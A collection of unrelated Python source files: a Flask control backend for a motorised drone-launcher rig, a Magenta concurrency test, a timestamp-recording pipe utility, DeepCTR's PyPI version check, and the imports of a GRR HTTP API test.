launch_min_acceleration=1 #Minimum launch acceleration
launch_standby=7335 #Drone position during stand-by - 55 cm
launch_mount=16359 #Drone position during mounting - 123 cm
launch_break=20335 #Belt position during breaking - 153 cm
launch_bottom=0 #Drone position at the back part of the capsule - 0 cm
launch_connect=2190 #Belt position for touching the upper part - 16.5 cm
"""seemingly useless encoders_ready safety"""
encoders_ready = 0 #At the beginning, the encoders are not ready
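#--- Illustrative sketch (not part of the original control code) ---
#Every positioning route below converts a requested position (degrees or cm) into encoder
#pulses with the same proportion: objective = total_pulses / (total_length / position).
#The hypothetical helper below only documents that pattern; the routes keep their inline arithmetic.
def position_to_pulses(position, total_length, total_pulses):
    """Map a position in physical units (degrees or cm) onto encoder pulses."""
    if position == 0:
        return 0
    return int(total_pulses / (total_length / position))
#Example: position_to_pulses(45, pitch_length, pitch_pulses) is roughly half of pitch_pulses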
#Create an instance of the Flask class for the web app
app = Flask(__name__)
##app.debug = True
#Render HTML template
@app.route("/")
def index():
return render_template('dronelauncher_web_test.html')
#Motor controller functions
try:
rc.ForwardM2(address, rotation_speed_manual)
rc.ForwardM2(address,0) #Both commands are used to avoid rotation
except AttributeError:
print("'Roboclaw' object has no attribute '_port' -> FAILURE TO DETECT ROBOCLAW")
@app.route('/app_pitch_up', methods=['POST'])
def function_pitch_up():
event.set()
rc.ForwardM1(address, pitch_speed_manual)
return (''), 204 #Returns an empty response
@app.route('/app_pitch_down', methods=['POST'])
def function_pitch_down():
event.set()
rc.BackwardM1(address, pitch_speed_manual)
return (''), 204
@app.route('/app_pitch_position', methods=['POST'])
def function_pitch_position():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
pitch_position = request.form.get('pitch_position', type=int)
if pitch_position > pitch_length or pitch_position < 0:
return (''), 400
elif pitch_position == 0:
pitch_objective = 0
else:
pitch_objective = int(pitch_pulses/(pitch_length/pitch_position))
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_pitch_stop', methods=['POST'])
def function_pitch_stop():
rc.ForwardM1(address,0)
event.clear()
sleep(0.02)
return (''), 204
@app.route('/app_rotation_right', methods=['POST'])
def function_rotation_right():
event.set()
rc.ForwardM2(address, rotation_speed_manual)
return (''), 204
@app.route('/app_rotation_left', methods=['POST'])
def function_rotation_left():
event.set()
rc.BackwardM2(address, rotation_speed_manual)
return (''), 204
@app.route('/app_rotation_position', methods=['POST'])
def function_rotation_position():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
rotation_position = request.form.get('rotation_position', type=int)
if rotation_position > rotation_length or rotation_position < -rotation_length:
return (''), 400
elif rotation_position == 0:
rotation_objective = 0
else:
rotation_objective = int((rotation_pulses/(rotation_length/rotation_position))/2)
rotation_actual = rc.ReadEncM2(address)[1]
rotation_increment = rotation_objective-rotation_actual
if rotation_increment >= 0:
rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_rotation_stop', methods=['POST'])
def function_rotation_stop():
rc.ForwardM2(address,0)
event.clear()
sleep(0.02)
return (''), 204
@app.route('/app_lift_up', methods=['POST'])
def function_lift_up():
event.set()
rc.ForwardM1(address_2, lift_speed_manual)
return (''), 204
@app.route('/app_lift_down', methods=['POST'])
def function_lift_down():
event.set()
rc.BackwardM1(address_2, lift_speed_manual)
return (''), 204
@app.route('/app_lift_position', methods=['POST'])
def function_lift_position():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
lift_position = request.form.get('lift_position', type=int)
if lift_position > lift_length or lift_position < 0:
return (''), 400
elif lift_position == 0:
lift_objective = 0
else:
lift_objective = int(lift_pulses/(lift_length/lift_position))
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_lift_stop', methods=['POST'])
def function_lift_stop():
rc.ForwardM1(address_2,0)
event.clear()
sleep(0.02)
return (''), 204
@app.route('/app_launch_forwards', methods=['POST'])
def function_launch_forwards():
event.set()
rc.ForwardM2(address_2, launch_speed_manual)
#rc.SpeedM2(address_2,launch_speed_pulses_slow) #Using the speed control instead of the duty cycle because the friction changes in the tube
return (''), 204
@app.route('/app_launch_backwards', methods=['POST'])
def function_launch_backwards():
event.set()
rc.BackwardM2(address_2, launch_speed_manual)
#rc.SpeedM2(address_2,-launch_speed_pulses_slow) #Using the speed control instead of the duty cycle because the friction changes in the tube
return (''), 204
@app.route('/app_launch_position', methods=['POST'])
def function_launch_position():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
launch_position = request.form.get('launch_position', type=int)
if launch_position > launch_length or launch_position < 0:
return (''), 400
else:
launch_objective = launch_bottom
launch_actual = rc.ReadEncM2(address_2)[1]
launch_increment = launch_objective-launch_actual
if launch_increment >= 0:
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
buffer_2 = (0,0,0)
while(buffer_2[2]!=0x80): #Loop until all movements are completed
buffer_2 = rc.ReadBuffers(address_2)
if launch_position == 0:
launch_objective = 0
else:
launch_objective = int(launch_pulses/(launch_length/launch_position))
launch_actual = rc.ReadEncM2(address_2)[1]
launch_increment = launch_objective-launch_actual #+launch_connect
if launch_increment >= 0:
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,0)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_launch_stop', methods=['POST'])
def function_launch_stop():
rc.ForwardM2(address_2,0)
event.clear()
sleep(0.02)
return (''), 204
@app.route('/app_max_pitch', methods=['POST'])
def function_max_pitch():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
pitch_objective = pitch_pulses
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_min_pitch', methods=['POST'])
def function_min_pitch():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
pitch_objective = 0
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_max_lift', methods=['POST'])
def function_max_lift():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
lift_objective = lift_pulses
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_min_lift', methods=['POST'])
def function_min_lift():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
lift_objective = 0
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_case_open', methods=['POST'])
def function_case_open():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
else:
rc.SpeedDistanceM1M2(address_3, 1500, 6000, 1500, 6000, 1)
return (''), 204
@app.route('/app_case_close', methods=['POST'])
def function_case_close():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
else:
rc.SpeedDistanceM1M2(address_3, -500, 6000, -500, 6000, 1)
return (''), 204
@app.route('/app_home', methods=['POST'])
def function_home():
event.set()
rc.BackwardM1(address, pitch_speed_manual)
rc.BackwardM1(address_2, lift_speed_manual)
rc.BackwardM2(address_2, launch_speed_manual)
#rc.SpeedM2(address_2,-launch_speed_pulses_slow) #Using the speed control instead of the duty cycle because the friction changes in the tube
#Missing rotation limit switch
event.clear()
return (''), 204
@app.route('/app_reset_encoders', methods=['POST'])
def function_reset_encoders():
"""This function does NOTHING"""
#rc.ResetEncoders(address)
#rc.ResetEncoders(address_2)
global encoders_ready
encoders_ready = 1 #Encoders have been reset
return (''), 204
@app.route('/app_battery_voltage', methods=['POST'])
def function_battery_voltage():
voltage = round(0.1*rc.ReadMainBatteryVoltage(address)[1],2)
return jsonify(voltage=voltage)
@app.route('/measurements', methods=['GET'])
def data_display():
'''
    This function gets the data from the gyroscope and the temperature sensor and sends them to the webpage
'''
# threading.Thread(target = thermo.portread_loop, daemon = False).start()
try:
temp = thermo.read_temp()
except:
temp = 'NaN'
try:
x_rotation = MPU9250.gyro_data()[0]
except:
x_rotation = 'NaN'
try:
y_rotation = MPU9250.gyro_data()[1]
except:
y_rotation = 'NaN'
try:
angle = MPU9250.gyro_data()[2]
except:
angle = 'NaN'
try:
gyro_temp = MPU9250.gyro_data()[3]
except:
gyro_temp = 'NaN'
try:
cpu_temp = MPU9250.gyro_data()[4]
except:
cpu_temp = 'NaN'
return jsonify(temperature=temp,x_rotation=x_rotation,
y_rotation=y_rotation, angle=angle,
gyro_temp=gyro_temp, cpu_temp=cpu_temp)
#Don't forget to add the return variables
@app.route('/app_stop', methods=['POST'])
def function_stop():
"""Using rc.SpeedDistanceM1M2 here would also wash-over remaining buffers?"""
rc.ForwardM1(address,0)
rc.ForwardM2(address,0)
rc.ForwardM1(address_2,0)
rc.ForwardM2(address_2,0)
rc.ForwardM1(address_3,0)
rc.ForwardM2(address_3,0)
event.clear()
sleep(0.02)
return (''), 204
@app.route('/app_standby', methods=['POST'])
def function_standby():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
pitch_objective = 0
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
rotation_objective = 0
rotation_actual = rc.ReadEncM2(address)[1]
rotation_increment = rotation_objective-rotation_actual
if rotation_increment >= 0:
rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
lift_objective = 0
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
launch_objective = launch_bottom
launch_actual = rc.ReadEncM2(address_2)[1]
launch_increment = launch_objective-launch_actual
if launch_increment >= 0:
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_standby,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
"""Waiting on buffers here would mean we can wait until all motors have stopped before closing the case again"""
event.clear()
return (''), 204
@app.route('/app_prepare', methods=['POST'])
def function_prepare():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
rc.SpeedDistanceM1M2(address_3, 1500, 6000, 1500, 6000, 1) #Open case
if pitch_ready == 0:
pitch_objective = 0
else:
pitch_objective = int(pitch_pulses/(pitch_length/pitch_ready))
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
if rotation_ready == 0:
rotation_objective = 0
else:
rotation_objective = int(rotation_pulses/(rotation_length/rotation_ready))
rotation_actual = rc.ReadEncM2(address)[1]
rotation_increment = rotation_objective-rotation_actual
if rotation_increment >= 0:
rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
if lift_ready == 0:
lift_objective = 0
else:
lift_objective = int(lift_pulses/(lift_length/lift_ready))
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
launch_objective = launch_bottom
launch_actual = rc.ReadEncM2(address_2)[1]
launch_increment = launch_objective-launch_actual
if launch_increment >= 0:
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_launch', methods=['POST'])
def function_launch():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
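    #Phase 1: slowly bring the launch carriage back to the bottom of the capsule before accelerating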
launch_objective = launch_bottom
launch_actual = rc.ReadEncM2(address_2)[1]
launch_increment = launch_objective-launch_actual
if launch_increment >= 0:
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_connect,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
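    #Phase 2: accelerate the belt from the connect position up to the braking point to launch the drone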
launch_objective = launch_break
launch_actual = launch_connect
launch_increment = launch_objective-launch_actual
rc.SpeedAccelDistanceM2(address_2,launch_acceleration,launch_speed_pulses,launch_increment,0)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_mount', methods=['POST'])
def function_mount():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
pitch_objective = pitch_pulses
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
rotation_objective = 0
rotation_actual = rc.ReadEncM2(address)[1]
rotation_increment = rotation_objective-rotation_actual
if rotation_increment >= 0:
rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
lift_objective = 0
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
launch_objective = launch_bottom
launch_actual = rc.ReadEncM2(address_2)[1]
launch_increment = launch_objective-launch_actual
if launch_increment >= 0:
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_mount,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_disable_buttons', methods=['POST'])
def function_disable_buttons():
return jsonify(encoders_ready=encoders_ready)
# Testing having the lights and temperature as a part of the backend code
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--clear', action='store_true', help='clear the display on exit')
args = parser.parse_args()
try:
strip.begin()
except NameError as e:
print(f"{e}: name 'strip' is not defined")
except RuntimeError:
print("ws2811_init failed with code -5 (mmap() failed)")
try:
colorWipe(strip, Color(255, 255, 255))
except NameError:
print("'strip is not defined'")
#For starting the thread when booting
event = Event()
Thread(target=relay_activate).start()
if __name__ == "__main__":
try:
app.run('localhost',port=5000, debug=True)
except KeyboardInterrupt:
if args.clear:
colorWipe(strip, Color(0, 0, 0), 10)
|
concurrency_test.py
|
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for concurrency."""
import threading
import time
import tensorflow as tf
from magenta.common import concurrency
class ConcurrencyTest(tf.test.TestCase):
def testSleeper_SleepUntil(self):
# Burn in.
for _ in range(10):
concurrency.Sleeper().sleep(.01)
future_time = time.time() + 0.5
concurrency.Sleeper().sleep_until(future_time)
self.assertAlmostEquals(time.time(), future_time, delta=0.005)
def testSleeper_Sleep(self):
# Burn in.
for _ in range(10):
concurrency.Sleeper().sleep(.01)
def sleep_test_thread(duration):
start_time = time.time()
concurrency.Sleeper().sleep(duration)
self.assertAlmostEquals(time.time(), start_time + duration, delta=0.005)
threads = [threading.Thread(target=sleep_test_thread, args=[i * 0.1])
for i in range(10)]
for t in threads:
t.start()
for t in threads:
t.join()
if __name__ == '__main__':
tf.test.main()
|
metered_pipe.py
|
# RA, 2021-11-05
"""
A Pipe analog that records the timestamps of writes and reads.
NB: May require a call to flush() when done.
"""
import collections
import contextlib
import typing
import queue
import time
import multiprocessing
import matplotlib.pyplot
import pandas
import numpy
import inclusive
import plox
INTERVAL_ON_QUEUE_FULL = 1e-5 # seconds
RETRY_FLUSH_ON_QUEUE_FULL = 10
# The pipe performs an actual queue put at most once per this interval,
# and buffers locally in between. A reasonable value is between
# 1e-6 (system-limited) and 1e-4 (max speed) seconds per send.
SYSTEM_SEND_MAX_FREQUENCY = 1e-4  # seconds / send
class CW:
def __init__(self, q: queue.Queue):
self.q = q
self.n = 0
self.buffer = []
self.last_successful_put = 0
def flush(self):
for retry in range(RETRY_FLUSH_ON_QUEUE_FULL):
try:
self.q.put(
[
(obj, n, s0, time.time())
for (n, (obj, s0)) in enumerate(self.buffer, start=self.n)
],
block=False
)
except queue.Full:
time.sleep(INTERVAL_ON_QUEUE_FULL)
else:
self.last_successful_put = time.time()
self.n += len(self.buffer)
self.buffer = []
return
# Didn't flush this time because the queue is full.
pass
def send(self, obj):
s0 = time.time()
self.buffer.append((obj, s0))
if (s0 < (self.last_successful_put + SYSTEM_SEND_MAX_FREQUENCY)):
pass
else:
self.flush()
@property
def writable(self):
return True
def __del__(self):
if self.buffer:
raise RuntimeError("Pipe `send` buffer is not empty. Call flush() on it.")
class CR:
def __init__(self, q):
self.q = q
self.buffer = []
self._log = collections.deque(maxlen=(2 ** 32))
def fetch(self):
t0 = time.time()
for (obj, n, s0, s1) in self.q.get(block=True):
self.buffer.append(obj)
t1 = time.time()
assert (n == len(self._log))
self._log.append({'s0': s0, 's1': s1, 't0': t0, 't1': t1})
self.q.task_done()
def recv(self):
if not self.buffer:
self.fetch()
obj = self.buffer[0]
self.buffer = self.buffer[1:]
return obj
def flush_log_using(self, f: typing.Callable):
while self._log:
f(self._log.popleft())
@property
def readable(self):
return True
def MeteredPipe(duplex=True, q=None):
if duplex:
raise NotImplementedError
PIPE_BUFFER_SIZE = 2 ** 12
if not q:
# `maxsize` is the number of objects
q = multiprocessing.Manager().Queue(maxsize=PIPE_BUFFER_SIZE)
# Something like this would also work and may be a little faster
# OBJ_SIZE = 1024
# q = faster_fifo.Queue(PIPE_BUFFER_SIZE * OBJ_SIZE)
return (CR(q), CW(q))
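# A hedged, single-process usage sketch (the speed_test below exercises the intended
# multi-process setup). It shows the send/flush/recv round trip and how the reader's
# timing log can be drained; the helper name is illustrative only.
def single_process_demo():
    (cr, cw) = MeteredPipe(duplex=False)
    for i in range(3):
        cw.send(i)
    cw.flush()  # push whatever is still buffered locally onto the queue
    received = [cr.recv() for _ in range(3)]
    cr.flush_log_using(print)  # each record holds the s0/s1/t0/t1 timestamps
    return received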
def speed_test():
"""
Number of pure .send() calls per second.
while .recv() is running in parallel.
"""
(cr, cw) = MeteredPipe(duplex=False)
def recv(cr):
while True:
if cr.recv() is None:
break
# Prepare consumer process
p = multiprocessing.Process(target=recv, args=(cr,))
p.start()
test_interval = 2
t0 = time.time()
while (time.time() < t0 + test_interval):
cw.send(0)
cw.send(None)
cw.flush()
# Consumer process
p.join(timeout=(test_interval + 1))
return (cw.n - 1) / test_interval
@contextlib.contextmanager
def visualize(cr_logs: list, decimals=3) -> plox.Plox:
np = numpy
df = pandas.DataFrame(data=cr_logs)
assert list(df.columns) == ['s0', 's1', 't0', 't1']
tt = df.s0
# offset each record by its `sent` timestamp
df = (df.T - df.s0).T
# print(df.to_markdown())
# round to `decimals` and offset by the same
rounding = np.ceil
df = df.applymap(
lambda x:
0 if (x == 0) else
np.sign(x) * (1 + max(0, rounding(np.log10(np.abs(x)) + decimals)))
)
from plox import rcParam
style = {
rcParam.Figure.figsize: (16, 1),
rcParam.Axes.linewidth: 0.01,
rcParam.Font.size: 6,
rcParam.Figure.dpi: 720,
}
with plox.Plox(style) as px:
v = int(np.ceil(df.abs().max().max()))
im = px.a.imshow(df.T, aspect='auto', interpolation='none', vmin=(-v * 1.1), vmax=(v * 1.1), cmap='coolwarm')
px.a.set_yticks(np.arange(len(df.columns)))
px.a.set_yticklabels(df.columns)
px.a.set_xlabel("Event")
px.a.invert_yaxis()
cb = px.f.colorbar(im, aspect=3)
cb.set_ticks(inclusive.range[-v, v])
# note the reverse offset by `decimals`
labels = [
fr"$10^{{{np.abs(x) - decimals - 1}}}$s"
if x else "0"
for x in cb.get_ticks()
]
cb.ax.set_yticklabels(labels=labels, fontsize=5)
cb.ax.text(0.5, +v, "behind", ha='right', va='top', rotation=-90)
cb.ax.text(0.5, -v, "ahead", ha='right', va='bottom', rotation=-90)
# How many events within the last `k` seconds
nn = np.zeros_like(tt)
k = 3e-3 # timescale (seconds)
nn[0] = 1
for ((m, ta), (n, tb)) in zip(enumerate(tt), enumerate(tt[1:], start=1)):
nn[n] = 1 + (nn[m] * np.exp(-(tb - ta) / k))
nn *= (1e-3 / k)
ax: matplotlib.pyplot.Axes = px.a.twinx()
ax.plot(tt.index, nn, c='k', lw=0.2)
ax.set_ylim(-1, max(nn) + 2)
ax.set_ylabel("Events / ms")
# Example usage:
# px.f.savefig(Path(__file__).with_suffix('.png'), dpi=720)
yield px
if __name__ == '__main__':
print(f"MeteredPipe speed test: {speed_test()} sends per second.")
|
utils.py
|
# -*- coding:utf-8 -*-
"""
Author:
Weichen Shen,wcshen1994@163.com
"""
import json
import logging
from threading import Thread
import requests
try:
from packaging.version import parse
except ImportError:
from pip._vendor.packaging.version import parse
def check_version(version):
"""Return version of package on pypi.python.org using json."""
def check(version):
try:
url_pattern = 'https://pypi.python.org/pypi/deepctr/json'
req = requests.get(url_pattern)
latest_version = parse('0')
version = parse(version)
if req.status_code == requests.codes.ok:
j = json.loads(req.text.encode('utf-8'))
releases = j.get('releases', [])
for release in releases:
ver = parse(release)
if ver.is_prerelease or ver.is_postrelease:
continue
latest_version = max(latest_version, ver)
if latest_version > version:
logging.warning(
                        '\nDeepCTR version {0} detected. Your version is {1}.\nUse `pip install -U deepctr` to upgrade. Changelog: https://github.com/shenweichen/DeepCTR/releases/tag/v{0}'.format(
latest_version, version))
except Exception as e:
print(e)
return
Thread(target=check, args=(version,)).start()
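
# Hedged usage sketch: DeepCTR normally calls check_version() with its own __version__
# at import time; the version string below is only a placeholder for illustration.
if __name__ == '__main__':
    check_version('0.1.0')  # warns in the background if a newer release exists on PyPI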
|
http_api_e2e_test.py
|
#!/usr/bin/env python
# -*- mode: python; encoding: utf-8 -*-
"""End-to-end tests for HTTP API.
HTTP API plugins are tested with their own dedicated unit-tests that are
protocol- and server-independent. Tests in this file test the full GRR server
stack with regards to the HTTP API.
"""
import datetime
import json
import logging
import os
import StringIO
import threading
import time
import zipfile
from cryptography import x509
from cryptography.hazmat import backends
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives import serialization
from cryptography.x509 import oid
import portpicker
import requests
import unittest
from grr_api_client import api as grr_api
from grr_api_client import errors as grr_api_errors
